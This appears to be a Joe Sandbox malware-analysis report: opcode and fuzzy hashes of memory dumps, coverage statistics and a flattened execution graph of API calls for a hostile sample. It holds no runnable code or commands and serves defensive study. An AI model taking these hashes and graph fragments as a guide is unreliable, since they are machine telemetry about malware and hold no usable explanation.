                                                                          • Opcode Fuzzy Hash: dde66b0294f36b2d7634250727897470e7930e5e3e3b2384a8c8944e079c896f
                                                                          • Instruction Fuzzy Hash: DF31B16080EBC24FE3239B3488657417FA09F43268F1D06DEC0C18A5E7D7EDA48AC312
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2436627954.00007FF848BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ba0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d940d7c138395d699b33fbfaa5f0d9375672f2df35293a973771acad7f5304ac
                                                                          • Instruction ID: 7fb154ba7625b6183de653fa7060366b25aab1d1574e0dd1e9cdcae1782ccbf2
                                                                          • Opcode Fuzzy Hash: d940d7c138395d699b33fbfaa5f0d9375672f2df35293a973771acad7f5304ac
                                                                          • Instruction Fuzzy Hash: 0D11B131E1EF575FE798AA6C985617872E2EF49291F5800BED00DC35E2DF29E8458208
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47464642547a1ec62d0dd5d86b3f5f0136acdcb2c80108e9c156ac838bef5172
                                                                          • Instruction ID: c3f2f7c264d02c91189a97c3addbdeed4c2ec4e594a956794e65f27685fa4c98
                                                                          • Opcode Fuzzy Hash: 47464642547a1ec62d0dd5d86b3f5f0136acdcb2c80108e9c156ac838bef5172
                                                                          • Instruction Fuzzy Hash: C201F57090D6885FC704EB6884165A9BBE0EF89360F0446BEE04DC7152DB39D9418B51
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 15670ee2ca623160e32936f65c906d55076f57c278084631ab2cd93c5d0ea6f3
                                                                          • Instruction ID: 49d6fabecaa61cb0bd6c0d6fee0a0ed5148ecda012ffbbf8681df42ba0a930a8
                                                                          • Opcode Fuzzy Hash: 15670ee2ca623160e32936f65c906d55076f57c278084631ab2cd93c5d0ea6f3
                                                                          • Instruction Fuzzy Hash: 9A01677111CB0C4FDB44EF0CE451AA9B7E0FB95364F10056DE58AC3691DB36E891CB46
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 333bb3ac59cdfea4d24e70ffe9760a1aaa966e5dc291af53cb41c3bf86d3f783
                                                                          • Instruction ID: 027d79d9cff147dfb8b6b530622342d7104b8b0c288878d739860d7e51a6385f
                                                                          • Opcode Fuzzy Hash: 333bb3ac59cdfea4d24e70ffe9760a1aaa966e5dc291af53cb41c3bf86d3f783
                                                                          • Instruction Fuzzy Hash: 16F06231B5990A4FDB94E65CD0917A5B3D2FF98350F505179D10DC728ADD78E8428781
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2446471735.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848e20000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eafd1cb7aa3c5fb41c6cfd5d547f685aafa0086ba079903694ffd71a769fb7c8
                                                                          • Instruction ID: ab2c656f88763487cfa9280ae3157182f2d867aaf89dc81971f9a148750d66ac
                                                                          • Opcode Fuzzy Hash: eafd1cb7aa3c5fb41c6cfd5d547f685aafa0086ba079903694ffd71a769fb7c8
                                                                          • Instruction Fuzzy Hash: 53F0D47052CF499FDA84EF1CC88592A7BF1FFA9781F50082EE049C72A0CB31E8458B02
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 61d558a721978ba3ab8bbe4337aa5000c25845becd52cfb56e53021978749473
                                                                          • Instruction ID: de518834e77ed70a8b34ef3a4bf0a83f8de814bdca36c9dccb30dfdb3dbd69cb
                                                                          • Opcode Fuzzy Hash: 61d558a721978ba3ab8bbe4337aa5000c25845becd52cfb56e53021978749473
                                                                          • Instruction Fuzzy Hash: 30F0A93061560D8FD744EF28C804A9233A1FB09304F4000AAE808CB282DB7AE9A1CBA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d91b644c6f488b074719100525377716cced16ea2f62d429b7159bce068729cd
                                                                          • Instruction ID: 73231816db54eb063c8c45cdbba5c397ff1065594af881269b2d480b37fa576e
                                                                          • Opcode Fuzzy Hash: d91b644c6f488b074719100525377716cced16ea2f62d429b7159bce068729cd
                                                                          • Instruction Fuzzy Hash: 24E0C210E5F5860EEA98F239185F2B819C2EF91280F8845BCD40CC22C2EDCE9880892B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 19ea11715c4b51a36de0716c0003ad224d3b92c01a0a5c1fd1d518f7859a09a8
                                                                          • Instruction ID: b2e0eb7dbfecc01c7a7ab1cad02bafe7625097203ff542ea0b7b24d4ba578394
                                                                          • Opcode Fuzzy Hash: 19ea11715c4b51a36de0716c0003ad224d3b92c01a0a5c1fd1d518f7859a09a8
                                                                          • Instruction Fuzzy Hash: A6E08CA184F3E01FCB43A379846E4D5BFA09E0B22134901EED1C6CF1A3D259044AC742
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 682701ed291eadc54f6a8c405c689e51de7624ccdada40b6a691292f6ce02ddc
                                                                          • Instruction ID: 1d698d11f478a633e69289f88685e07a21db8a2ee834d71fb2803586b0658b16
                                                                          • Opcode Fuzzy Hash: 682701ed291eadc54f6a8c405c689e51de7624ccdada40b6a691292f6ce02ddc
                                                                          • Instruction Fuzzy Hash: 7FB01211C1913909E704FAC9B9474F873C08B503D1F010865EC04CD1C3D59D52E246BA

                                                                          Execution Graph

                                                                          Execution Coverage:4.7%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:1.5%
                                                                          Total number of Nodes:1767
                                                                          Total number of Limit Nodes:2
execution_graph: flattened node/edge list of the execution graph (node ids, function addresses such as 7ff762441f47, and the API calls observed at each node, e.g. VirtualProtect, EnterCriticalSection, TlsGetValue, memcpy); the rendered graph itself is not recoverable from the text extraction.
3524 7ff762441394 2 API calls 3523->3524 3525 7ff7624414f4 3524->3525 3526 7ff762441394 2 API calls 3525->3526 3527 7ff762441503 3526->3527 3528 7ff762441394 2 API calls 3527->3528 3529 7ff762441512 3528->3529 3530 7ff762441394 2 API calls 3529->3530 3531 7ff762441521 3530->3531 3532 7ff762441530 3531->3532 3533 7ff762441394 2 API calls 3531->3533 3534 7ff762441394 2 API calls 3532->3534 3533->3532 3535 7ff76244153a 3534->3535 3536 7ff762441394 2 API calls 3535->3536 3537 7ff76244153f 3536->3537 3538 7ff76244154e 3537->3538 3539 7ff762441394 2 API calls 3537->3539 3540 7ff762441394 2 API calls 3538->3540 3539->3538 3541 7ff762441558 3540->3541 3542 7ff76244155d 3541->3542 3543 7ff762441394 2 API calls 3541->3543 3544 7ff762441394 2 API calls 3542->3544 3543->3542 3545 7ff762441567 3544->3545 3546 7ff76244156c 3545->3546 3547 7ff762441394 2 API calls 3545->3547 3548 7ff762441394 2 API calls 3546->3548 3547->3546 3549 7ff762441576 3548->3549 3550 7ff76244157b 3549->3550 3551 7ff762441394 2 API calls 3549->3551 3552 7ff762441394 2 API calls 3550->3552 3551->3550 3553 7ff762441585 3552->3553 3554 7ff76244158a 3553->3554 3555 7ff762441394 2 API calls 3553->3555 3556 7ff762441394 2 API calls 3554->3556 3555->3554 3557 7ff762441599 3556->3557 3558 7ff762441394 2 API calls 3557->3558 3559 7ff7624415a3 3558->3559 3560 7ff762441394 2 API calls 3559->3560 3561 7ff7624415a8 3560->3561 3562 7ff762441394 2 API calls 3561->3562 3563 7ff7624415b7 3562->3563 3564 7ff762441394 2 API calls 3563->3564 3565 7ff7624415c6 3564->3565 3566 7ff762441394 2 API calls 3565->3566 3567 7ff7624415d5 3566->3567 3568 7ff762441394 2 API calls 3567->3568 3569 7ff7624415e4 3568->3569 3570 7ff762441394 2 API calls 3569->3570 3571 7ff7624415f3 3570->3571 3571->3038 3573 7ff762441394 2 API calls 3572->3573 3574 7ff762441585 3573->3574 3575 7ff76244158a 3574->3575 3576 7ff762441394 2 API calls 3574->3576 3577 7ff762441394 2 API calls 3575->3577 3576->3575 3578 7ff762441599 3577->3578 3579 7ff762441394 2 
API calls 3578->3579 3580 7ff7624415a3 3579->3580 3581 7ff762441394 2 API calls 3580->3581 3582 7ff7624415a8 3581->3582 3583 7ff762441394 2 API calls 3582->3583 3584 7ff7624415b7 3583->3584 3585 7ff762441394 2 API calls 3584->3585 3586 7ff7624415c6 3585->3586 3587 7ff762441394 2 API calls 3586->3587 3588 7ff7624415d5 3587->3588 3589 7ff762441394 2 API calls 3588->3589 3590 7ff7624415e4 3589->3590 3591 7ff762441394 2 API calls 3590->3591 3592 7ff7624415f3 3591->3592 3592->3049 3593 7ff76244158a 3592->3593 3594 7ff762441394 2 API calls 3593->3594 3595 7ff762441599 3594->3595 3596 7ff762441394 2 API calls 3595->3596 3597 7ff7624415a3 3596->3597 3598 7ff762441394 2 API calls 3597->3598 3599 7ff7624415a8 3598->3599 3600 7ff762441394 2 API calls 3599->3600 3601 7ff7624415b7 3600->3601 3602 7ff762441394 2 API calls 3601->3602 3603 7ff7624415c6 3602->3603 3604 7ff762441394 2 API calls 3603->3604 3605 7ff7624415d5 3604->3605 3606 7ff762441394 2 API calls 3605->3606 3607 7ff7624415e4 3606->3607 3608 7ff762441394 2 API calls 3607->3608 3609 7ff7624415f3 3608->3609 3609->3049 3611 7ff762441394 2 API calls 3610->3611 3612 7ff7624415f3 3611->3612 3612->3050 3614 7ff7624438ed 3613->3614 3615 7ff762443932 wcscpy wcscat wcslen 3614->3615 3616 7ff76244146d 2 API calls 3615->3616 3617 7ff7624439ed 3616->3617 3618 7ff762443abd 3617->3618 4058 7ff762441530 3617->4058 3618->3062 3632 7ff7624414a9 3618->3632 3621 7ff762443a39 3624 7ff7624414a9 2 API calls 3621->3624 3622 7ff762443ad6 3623 7ff76244145e 2 API calls 3622->3623 3623->3618 3625 7ff762443a7a 3624->3625 3626 7ff762443ac4 3625->3626 4097 7ff762441440 3625->4097 3628 7ff76244145e 2 API calls 3626->3628 3628->3618 3630 7ff762443ab3 3631 7ff76244145e 2 API calls 3630->3631 3631->3618 3633 7ff762441394 2 API calls 3632->3633 3634 7ff7624414b8 3633->3634 3635 7ff762441394 2 API calls 3634->3635 3636 7ff7624414c7 3635->3636 3637 7ff762441394 2 API calls 3636->3637 3638 7ff7624414d6 3637->3638 3639 7ff762441394 2 API calls 3638->3639 
3640 7ff7624414e5 3639->3640 3641 7ff762441394 2 API calls 3640->3641 3642 7ff7624414f4 3641->3642 3643 7ff762441394 2 API calls 3642->3643 3644 7ff762441503 3643->3644 3645 7ff762441394 2 API calls 3644->3645 3646 7ff762441512 3645->3646 3647 7ff762441394 2 API calls 3646->3647 3648 7ff762441521 3647->3648 3649 7ff762441530 3648->3649 3650 7ff762441394 2 API calls 3648->3650 3651 7ff762441394 2 API calls 3649->3651 3650->3649 3652 7ff76244153a 3651->3652 3653 7ff762441394 2 API calls 3652->3653 3654 7ff76244153f 3653->3654 3655 7ff76244154e 3654->3655 3656 7ff762441394 2 API calls 3654->3656 3657 7ff762441394 2 API calls 3655->3657 3656->3655 3658 7ff762441558 3657->3658 3659 7ff76244155d 3658->3659 3660 7ff762441394 2 API calls 3658->3660 3661 7ff762441394 2 API calls 3659->3661 3660->3659 3662 7ff762441567 3661->3662 3663 7ff76244156c 3662->3663 3664 7ff762441394 2 API calls 3662->3664 3665 7ff762441394 2 API calls 3663->3665 3664->3663 3666 7ff762441576 3665->3666 3667 7ff76244157b 3666->3667 3668 7ff762441394 2 API calls 3666->3668 3669 7ff762441394 2 API calls 3667->3669 3668->3667 3670 7ff762441585 3669->3670 3671 7ff76244158a 3670->3671 3672 7ff762441394 2 API calls 3670->3672 3673 7ff762441394 2 API calls 3671->3673 3672->3671 3674 7ff762441599 3673->3674 3675 7ff762441394 2 API calls 3674->3675 3676 7ff7624415a3 3675->3676 3677 7ff762441394 2 API calls 3676->3677 3678 7ff7624415a8 3677->3678 3679 7ff762441394 2 API calls 3678->3679 3680 7ff7624415b7 3679->3680 3681 7ff762441394 2 API calls 3680->3681 3682 7ff7624415c6 3681->3682 3683 7ff762441394 2 API calls 3682->3683 3684 7ff7624415d5 3683->3684 3685 7ff762441394 2 API calls 3684->3685 3686 7ff7624415e4 3685->3686 3687 7ff762441394 2 API calls 3686->3687 3688 7ff7624415f3 3687->3688 3688->3068 3688->3069 3690 7ff7624435c1 memset 3689->3690 3700 7ff7624433c3 3689->3700 3691 7ff7624435e6 3690->3691 3693 7ff76244362b wcscpy wcscat wcslen 3691->3693 3692 7ff76244343a memset 3692->3700 3694 7ff762441422 2 
API calls 3693->3694 3696 7ff762443728 3694->3696 3695 7ff762443493 wcscpy wcscat wcslen 4176 7ff762441422 3695->4176 3698 7ff762443767 3696->3698 4263 7ff762441431 3696->4263 3705 7ff7624414c7 3698->3705 3700->3690 3700->3692 3700->3695 3702 7ff76244145e 2 API calls 3700->3702 3704 7ff762443579 3700->3704 3702->3700 3703 7ff76244145e 2 API calls 3703->3698 3704->3690 3706 7ff762441394 2 API calls 3705->3706 3707 7ff7624414d6 3706->3707 3708 7ff762441394 2 API calls 3707->3708 3709 7ff7624414e5 3708->3709 3710 7ff762441394 2 API calls 3709->3710 3711 7ff7624414f4 3710->3711 3712 7ff762441394 2 API calls 3711->3712 3713 7ff762441503 3712->3713 3714 7ff762441394 2 API calls 3713->3714 3715 7ff762441512 3714->3715 3716 7ff762441394 2 API calls 3715->3716 3717 7ff762441521 3716->3717 3718 7ff762441530 3717->3718 3719 7ff762441394 2 API calls 3717->3719 3720 7ff762441394 2 API calls 3718->3720 3719->3718 3721 7ff76244153a 3720->3721 3722 7ff762441394 2 API calls 3721->3722 3723 7ff76244153f 3722->3723 3724 7ff76244154e 3723->3724 3725 7ff762441394 2 API calls 3723->3725 3726 7ff762441394 2 API calls 3724->3726 3725->3724 3727 7ff762441558 3726->3727 3728 7ff76244155d 3727->3728 3729 7ff762441394 2 API calls 3727->3729 3730 7ff762441394 2 API calls 3728->3730 3729->3728 3731 7ff762441567 3730->3731 3732 7ff76244156c 3731->3732 3733 7ff762441394 2 API calls 3731->3733 3734 7ff762441394 2 API calls 3732->3734 3733->3732 3735 7ff762441576 3734->3735 3736 7ff76244157b 3735->3736 3737 7ff762441394 2 API calls 3735->3737 3738 7ff762441394 2 API calls 3736->3738 3737->3736 3739 7ff762441585 3738->3739 3740 7ff76244158a 3739->3740 3741 7ff762441394 2 API calls 3739->3741 3742 7ff762441394 2 API calls 3740->3742 3741->3740 3743 7ff762441599 3742->3743 3744 7ff762441394 2 API calls 3743->3744 3745 7ff7624415a3 3744->3745 3746 7ff762441394 2 API calls 3745->3746 3747 7ff7624415a8 3746->3747 3748 7ff762441394 2 API calls 3747->3748 3749 7ff7624415b7 3748->3749 3750 7ff762441394 2 
API calls 3749->3750 3751 7ff7624415c6 3750->3751 3752 7ff762441394 2 API calls 3751->3752 3753 7ff7624415d5 3752->3753 3754 7ff762441394 2 API calls 3753->3754 3755 7ff7624415e4 3754->3755 3756 7ff762441394 2 API calls 3755->3756 3757 7ff7624415f3 3756->3757 3757->3069 3759 7ff762442f88 3758->3759 3760 7ff7624414a9 2 API calls 3759->3760 3761 7ff762442fd0 3760->3761 3761->3066 3763 7ff762442690 10 API calls 3762->3763 3764 7ff762443bbe 3763->3764 3765 7ff7624414a9 2 API calls 3764->3765 3784 7ff762443dc1 3764->3784 3766 7ff762443c07 3765->3766 3767 7ff762443dc8 3766->3767 4346 7ff7624414b8 3766->4346 4595 7ff7624415c6 3767->4595 3770 7ff762443d27 memset 4406 7ff76244148b 3770->4406 3772 7ff7624414b8 2 API calls 3775 7ff762443c2f 3772->3775 3775->3770 3775->3772 4401 7ff7624415d5 3775->4401 3778 7ff7624414b8 2 API calls 3779 7ff762443da7 3778->3779 3779->3767 3780 7ff762443dab 3779->3780 4528 7ff76244147c 3780->4528 3783 7ff76244145e 2 API calls 3783->3784 3784->3073 3786 7ff762441394 2 API calls 3785->3786 3787 7ff762441558 3786->3787 3788 7ff76244155d 3787->3788 3789 7ff762441394 2 API calls 3787->3789 3790 7ff762441394 2 API calls 3788->3790 3789->3788 3791 7ff762441567 3790->3791 3792 7ff76244156c 3791->3792 3793 7ff762441394 2 API calls 3791->3793 3794 7ff762441394 2 API calls 3792->3794 3793->3792 3795 7ff762441576 3794->3795 3796 7ff76244157b 3795->3796 3797 7ff762441394 2 API calls 3795->3797 3798 7ff762441394 2 API calls 3796->3798 3797->3796 3799 7ff762441585 3798->3799 3800 7ff76244158a 3799->3800 3801 7ff762441394 2 API calls 3799->3801 3802 7ff762441394 2 API calls 3800->3802 3801->3800 3803 7ff762441599 3802->3803 3804 7ff762441394 2 API calls 3803->3804 3805 7ff7624415a3 3804->3805 3806 7ff762441394 2 API calls 3805->3806 3807 7ff7624415a8 3806->3807 3808 7ff762441394 2 API calls 3807->3808 3809 7ff7624415b7 3808->3809 3810 7ff762441394 2 API calls 3809->3810 3811 7ff7624415c6 3810->3811 3812 7ff762441394 2 API calls 3811->3812 3813 7ff7624415d5 
3812->3813 3814 7ff762441394 2 API calls 3813->3814 3815 7ff7624415e4 3814->3815 3816 7ff762441394 2 API calls 3815->3816 3817 7ff7624415f3 3816->3817 3817->3092 3819 7ff762441394 2 API calls 3818->3819 3820 7ff7624415b7 3819->3820 3821 7ff762441394 2 API calls 3820->3821 3822 7ff7624415c6 3821->3822 3823 7ff762441394 2 API calls 3822->3823 3824 7ff7624415d5 3823->3824 3825 7ff762441394 2 API calls 3824->3825 3826 7ff7624415e4 3825->3826 3827 7ff762441394 2 API calls 3826->3827 3828 7ff7624415f3 3827->3828 3828->3104 3828->3105 3830 7ff762443e10 wcslen 3829->3830 3838 7ff762443e8c 3829->3838 3832 7ff76244153f 2 API calls 3830->3832 3831 7ff762442f70 2 API calls 3833 7ff762443ec9 3831->3833 3834 7ff762443e7d 3832->3834 3835 7ff762443b80 11 API calls 3833->3835 3836 7ff76244145e 2 API calls 3834->3836 3837 7ff762443ee2 3835->3837 3836->3838 3840 7ff7624414c7 2 API calls 3837->3840 3838->3831 3839 7ff762443f48 3838->3839 3839->3125 3841 7ff762443f10 3840->3841 3841->3839 3842 7ff762443f40 3841->3842 4602 7ff762441413 3841->4602 3844 7ff76244145e 2 API calls 3842->3844 3844->3839 3849 7ff762448780 3845->3849 3847 7ff7624413b8 3848 7ff7624413c6 NtCloseObjectAuditAlarm 3847->3848 3848->3169 3850 7ff76244879e 3849->3850 3853 7ff7624487cb 3849->3853 3850->3847 3851 7ff762448873 3852 7ff76244888f malloc 3851->3852 3854 7ff7624488b0 3852->3854 3853->3850 3853->3851 3854->3850 3856 7ff76244266f memset 3855->3856 3856->3355 3933 7ff76244155d 3857->3933 3859 7ff7624427f4 3860 7ff7624414c7 2 API calls 3859->3860 3863 7ff762442816 3860->3863 3862 7ff762442785 wcsncmp 3962 7ff7624414e5 3862->3962 3865 7ff762441503 2 API calls 3863->3865 3867 7ff76244283d 3865->3867 3866 7ff762442d27 3868 7ff762442847 memset 3867->3868 3870 7ff762442877 3868->3870 3869 7ff7624428bc wcscpy wcscat wcslen 3871 7ff76244291a 3869->3871 3872 7ff7624428ee wcslen 3869->3872 3870->3869 3873 7ff762442967 wcslen 3871->3873 3875 7ff762442985 3871->3875 3872->3871 3873->3875 3874 7ff7624429d9 wcslen 3876 
7ff7624414a9 2 API calls 3874->3876 3875->3866 3875->3874 3877 7ff762442a73 3876->3877 3878 7ff7624414a9 2 API calls 3877->3878 3879 7ff762442bd2 3878->3879 4011 7ff7624414f4 3879->4011 3882 7ff7624414c7 2 API calls 3883 7ff762442c99 3882->3883 3884 7ff7624414c7 2 API calls 3883->3884 3885 7ff762442cb1 3884->3885 3886 7ff76244145e 2 API calls 3885->3886 3887 7ff762442cbb 3886->3887 3888 7ff76244145e 2 API calls 3887->3888 3889 7ff762442cc5 3888->3889 3889->3350 3891 7ff762441394 2 API calls 3890->3891 3892 7ff762441521 3891->3892 3893 7ff762441530 3892->3893 3894 7ff762441394 2 API calls 3892->3894 3895 7ff762441394 2 API calls 3893->3895 3894->3893 3896 7ff76244153a 3895->3896 3897 7ff762441394 2 API calls 3896->3897 3898 7ff76244153f 3897->3898 3899 7ff76244154e 3898->3899 3900 7ff762441394 2 API calls 3898->3900 3901 7ff762441394 2 API calls 3899->3901 3900->3899 3902 7ff762441558 3901->3902 3903 7ff76244155d 3902->3903 3904 7ff762441394 2 API calls 3902->3904 3905 7ff762441394 2 API calls 3903->3905 3904->3903 3906 7ff762441567 3905->3906 3907 7ff76244156c 3906->3907 3908 7ff762441394 2 API calls 3906->3908 3909 7ff762441394 2 API calls 3907->3909 3908->3907 3910 7ff762441576 3909->3910 3911 7ff76244157b 3910->3911 3912 7ff762441394 2 API calls 3910->3912 3913 7ff762441394 2 API calls 3911->3913 3912->3911 3914 7ff762441585 3913->3914 3915 7ff76244158a 3914->3915 3916 7ff762441394 2 API calls 3914->3916 3917 7ff762441394 2 API calls 3915->3917 3916->3915 3918 7ff762441599 3917->3918 3919 7ff762441394 2 API calls 3918->3919 3920 7ff7624415a3 3919->3920 3921 7ff762441394 2 API calls 3920->3921 3922 7ff7624415a8 3921->3922 3923 7ff762441394 2 API calls 3922->3923 3924 7ff7624415b7 3923->3924 3925 7ff762441394 2 API calls 3924->3925 3926 7ff7624415c6 3925->3926 3927 7ff762441394 2 API calls 3926->3927 3928 7ff7624415d5 3927->3928 3929 7ff762441394 2 API calls 3928->3929 3930 7ff7624415e4 3929->3930 3931 7ff762441394 2 API calls 3930->3931 3932 7ff7624415f3 
3931->3932 3932->3352 3934 7ff762441394 2 API calls 3933->3934 3935 7ff762441567 3934->3935 3936 7ff76244156c 3935->3936 3937 7ff762441394 2 API calls 3935->3937 3938 7ff762441394 2 API calls 3936->3938 3937->3936 3939 7ff762441576 3938->3939 3940 7ff76244157b 3939->3940 3941 7ff762441394 2 API calls 3939->3941 3942 7ff762441394 2 API calls 3940->3942 3941->3940 3943 7ff762441585 3942->3943 3944 7ff76244158a 3943->3944 3945 7ff762441394 2 API calls 3943->3945 3946 7ff762441394 2 API calls 3944->3946 3945->3944 3947 7ff762441599 3946->3947 3948 7ff762441394 2 API calls 3947->3948 3949 7ff7624415a3 3948->3949 3950 7ff762441394 2 API calls 3949->3950 3951 7ff7624415a8 3950->3951 3952 7ff762441394 2 API calls 3951->3952 3953 7ff7624415b7 3952->3953 3954 7ff762441394 2 API calls 3953->3954 3955 7ff7624415c6 3954->3955 3956 7ff762441394 2 API calls 3955->3956 3957 7ff7624415d5 3956->3957 3958 7ff762441394 2 API calls 3957->3958 3959 7ff7624415e4 3958->3959 3960 7ff762441394 2 API calls 3959->3960 3961 7ff7624415f3 3960->3961 3961->3859 3961->3862 3961->3866 3963 7ff762441394 2 API calls 3962->3963 3964 7ff7624414f4 3963->3964 3965 7ff762441394 2 API calls 3964->3965 3966 7ff762441503 3965->3966 3967 7ff762441394 2 API calls 3966->3967 3968 7ff762441512 3967->3968 3969 7ff762441394 2 API calls 3968->3969 3970 7ff762441521 3969->3970 3971 7ff762441530 3970->3971 3972 7ff762441394 2 API calls 3970->3972 3973 7ff762441394 2 API calls 3971->3973 3972->3971 3974 7ff76244153a 3973->3974 3975 7ff762441394 2 API calls 3974->3975 3976 7ff76244153f 3975->3976 3977 7ff76244154e 3976->3977 3978 7ff762441394 2 API calls 3976->3978 3979 7ff762441394 2 API calls 3977->3979 3978->3977 3980 7ff762441558 3979->3980 3981 7ff76244155d 3980->3981 3982 7ff762441394 2 API calls 3980->3982 3983 7ff762441394 2 API calls 3981->3983 3982->3981 3984 7ff762441567 3983->3984 3985 7ff76244156c 3984->3985 3986 7ff762441394 2 API calls 3984->3986 3987 7ff762441394 2 API calls 3985->3987 3986->3985 3988 
7ff762441576 3987->3988 3989 7ff76244157b 3988->3989 3990 7ff762441394 2 API calls 3988->3990 3991 7ff762441394 2 API calls 3989->3991 3990->3989 3992 7ff762441585 3991->3992 3993 7ff76244158a 3992->3993 3994 7ff762441394 2 API calls 3992->3994 3995 7ff762441394 2 API calls 3993->3995 3994->3993 3996 7ff762441599 3995->3996 3997 7ff762441394 2 API calls 3996->3997 3998 7ff7624415a3 3997->3998 3999 7ff762441394 2 API calls 3998->3999 4000 7ff7624415a8 3999->4000 4001 7ff762441394 2 API calls 4000->4001 4002 7ff7624415b7 4001->4002 4003 7ff762441394 2 API calls 4002->4003 4004 7ff7624415c6 4003->4004 4005 7ff762441394 2 API calls 4004->4005 4006 7ff7624415d5 4005->4006 4007 7ff762441394 2 API calls 4006->4007 4008 7ff7624415e4 4007->4008 4009 7ff762441394 2 API calls 4008->4009 4010 7ff7624415f3 4009->4010 4010->3859 4012 7ff762441394 2 API calls 4011->4012 4013 7ff762441503 4012->4013 4014 7ff762441394 2 API calls 4013->4014 4015 7ff762441512 4014->4015 4016 7ff762441394 2 API calls 4015->4016 4017 7ff762441521 4016->4017 4018 7ff762441530 4017->4018 4019 7ff762441394 2 API calls 4017->4019 4020 7ff762441394 2 API calls 4018->4020 4019->4018 4021 7ff76244153a 4020->4021 4022 7ff762441394 2 API calls 4021->4022 4023 7ff76244153f 4022->4023 4024 7ff76244154e 4023->4024 4025 7ff762441394 2 API calls 4023->4025 4026 7ff762441394 2 API calls 4024->4026 4025->4024 4027 7ff762441558 4026->4027 4028 7ff76244155d 4027->4028 4029 7ff762441394 2 API calls 4027->4029 4030 7ff762441394 2 API calls 4028->4030 4029->4028 4031 7ff762441567 4030->4031 4032 7ff76244156c 4031->4032 4033 7ff762441394 2 API calls 4031->4033 4034 7ff762441394 2 API calls 4032->4034 4033->4032 4035 7ff762441576 4034->4035 4036 7ff76244157b 4035->4036 4037 7ff762441394 2 API calls 4035->4037 4038 7ff762441394 2 API calls 4036->4038 4037->4036 4039 7ff762441585 4038->4039 4040 7ff76244158a 4039->4040 4041 7ff762441394 2 API calls 4039->4041 4042 7ff762441394 2 API calls 4040->4042 4041->4040 4043 
